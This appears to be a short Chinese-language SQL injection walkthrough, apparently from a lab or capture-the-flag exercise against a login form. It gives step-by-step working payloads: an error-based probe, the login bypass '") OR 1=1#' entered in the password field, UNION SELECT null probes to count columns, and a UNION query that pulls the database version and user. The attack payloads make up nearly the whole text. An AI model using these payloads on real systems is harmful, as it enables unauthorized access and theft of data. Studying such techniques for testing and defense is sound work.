1 寻找注入漏洞
1.1 注入双引号触发错误
根据错误信息判断需要闭合双引号和括号
1.2 构造payload验证漏洞,在密码框提交以下内容
") OR 1=1#
登录成功
2 开门见山,直接上联合查询
2.1 探测字段数
递归查询,直到无误
") union select null#
") union select null,null#
此处易得到字段数是两个
2.3 利用联合查询获取信息
eg:") union select version(),user()#